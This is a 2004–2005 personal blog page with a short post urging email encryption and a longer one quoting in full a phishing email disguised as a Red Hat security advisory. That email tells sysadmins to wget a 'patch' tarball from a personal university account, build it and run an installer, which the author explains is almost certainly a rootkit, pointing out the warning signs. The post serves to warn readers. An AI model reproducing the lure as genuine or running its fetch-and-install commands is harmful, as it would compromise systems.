Sun, 13 Nov 2005

A Meme That Isn't A Waste of Your Time

Sven-S. Porst challenged me to talk about email encryption (PGP/ S/MIME, or something), and to suggest to 5 others that they do the same… I realize that you aren’t all Mac folk, but it’s reasonably straightforward in Thunderbird, Outlook, Evolution, and several other mailers, so hopefully you’ll give it a whirl.

First, if you’re using Apple Mail, there’s a really friendly guide to getting it set up. Otherwise, the Wikipedia entries for S/MIME and PGP might be worth checking.

:: 21:19
:: /tech/computers/security | [+]
::Comments (0)

Sat, 23 Oct 2004

Redhat Phish

Looks like phishers are even going after sysadmins. Very interesting… I got the following email last night, sent to my webmaster account:


logo

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

  • First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
  • Untar the patch:tar zxvf fileutils-1.0.6.patch.tar.gz
  • cd fileutils-1.0.6.patch
  • make
  • ./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.


Very credible looking, except for a few little niggles:

  • Note that the “patch” (almost certainly a rootkit) is linked to an individual user’s (“joeio”) account
  • I seriously doubt that Redhat would be relaying through a random machine in Taiwan:
    Received: from mail.forcartex.com.tw (unknown [211.22.18.59]) by samantha.freeke.org (Postfix) with ESMTP id A355FFC7C39 for daddy@freeke.org; Sat, 23 Oct 2004 03:11:53 -0400 (EDT)

Anyway, I thought this was notable — I’ve seen phishes like this targeted at Windows users, but this is the first I’ve seen specifically targeting ‘nix admins. One would assume that they just collected a bunch of webmaster addresses, figuring (probably correctly) that a fair number of those boxes would be running Redhat. The email shows an attention to detail -- the HTML links to Redhat's real logo, linked from a Redhat server, and they even ran their HTML through Tidy!

Let's be careful out there!

:: 23:55
:: /tech/computers/security | [+]
::Comments (0)




“How do you know she is a unicorn?” Molly demanded. “And why were you afraid
to let her touch you? I saw you. You were afraid of her.”
“I doubt that I will feel like talking for very long,” the cat
replied without rancor. “I would not waste time in foolishness if I were
you. As to your first question, no cat out of its first fur can ever be
deceived by appearances. Unlike human beings, who enjoy them. As for your
second question —” Here he faltered, and suddenly became very interested
in washing; nor would he speak until he had licked himself fluffy and then
licked himself smooth again. Even then he would not look at Molly, but
examined his claws.
“If she had touched me,” he said very softly, “I would have been
hers and not my own, not ever again.”
— Peter S. Beagle, “The Last Unicorn”